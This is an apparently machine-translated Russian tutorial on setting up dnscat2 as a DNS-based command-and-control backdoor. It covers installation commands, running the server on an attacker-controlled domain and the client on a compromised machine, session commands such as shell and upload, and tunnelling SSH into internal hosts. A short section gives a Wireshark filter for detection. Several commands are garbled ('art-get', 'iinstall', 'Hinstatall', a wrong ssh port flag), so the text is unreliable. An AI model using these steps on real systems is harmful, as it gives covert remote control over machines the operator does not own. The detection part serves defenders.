DNSCAT – Бэкдор через DNS

DNSCAT – Бэкдор через DNS

Этичный Хакер

dnscat2 – программа для создания канала C&C с использованием DNS. Включает серверную часть, написанную на Ruby, и клиентскую часть, написанную на C. Command and Control server-это компьютер, управляемый злоумышленником, который отправляет команды на скомпрометированную машину.

Часто бывает так, что брандмауэрразрешение имен почти всегда позволяет пропускать обычный трафик. Вы можете увидеть пример схемы ниже:

Введите в терминал:

sudo apt-get crate sudo art-get -y iinstall ruby-dev git make g++ sudo gem install bundler git clone https://github.com/iagox86/dnscat2.git 

или.

sudo art-get crSate && sudo art-get -y inStall ruby-dev git make g++ && sudo gem install bundler && git clone https://github.com/iagox86/dnscat2.git. 

Установка серверной части:

cd dnscat2/server bundle Hinstatall 

Установка клиентской части:

cd dnscat2/client make 

Здесь описаны некоторые ошибки. Если у вас нет ошибки, напишите в этой теме или погуглите ее. iagox86/dnscat2

Случай

Запуск

Серверsudo ruby dnscat2.rb.

Клиент: запуск на удаленной машине.

Сервер

Код:

sudo ruby dnscat2.rb legitdnsserver.com 

Клиент

Код:

./build legitdnsserver.com 

номер сеанса dnscat2

Код:

session -i <номер сеанса> 

Код:

clear delay download echo exec help listen ping quit set shell shutdown suspend tunnels unset upload window windows 

Поиск туннеля

Если вам нужен удобный SSH-доступ к машинам в вашей локальной сети, это очень полезная вещь.

Выбираем сеанс и вводим команду:

listen <port> <dest ip>:<ssh port> 

Теперь вы можете легко подключиться к машине, которая не видна снаружи, через ssh.

ssh -P <порт> username@127.0.0.1. 

Кстати, dnscat2 по умолчанию поддерживает шифрование. Автор говорит, что это не гарантирует 100% криптографической стабильности, но защита есть.

Как обнаружить dnscat2 на компьютере.

Свалка через wireshark и забить следующий фильтр:

dns.qry.name.len > 16 and !mdns 

16 – только длина доменного имени DNS. Я взял трубку вручную, у вас может быть другой номер. Чтобы найти его, просто посмотрите на результат фильтра.

После этого фильтра могут остаться обычные DNS-запросы, просто найдите dnscat.

А в информации о пакете мы ищем dnscat.

Служебные ссылки

https://github.com/iagox86/dnscat2 – Страница dnscat, с ее документацией.

https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152 – Об обнаружении туннелей DNS.

P. S, возможно, вышел за рамки раздела “Программное обеспечение” в некоторых моментах, но было необходимо показать функциональность. Спасибо вам всем за внимание.


Report Page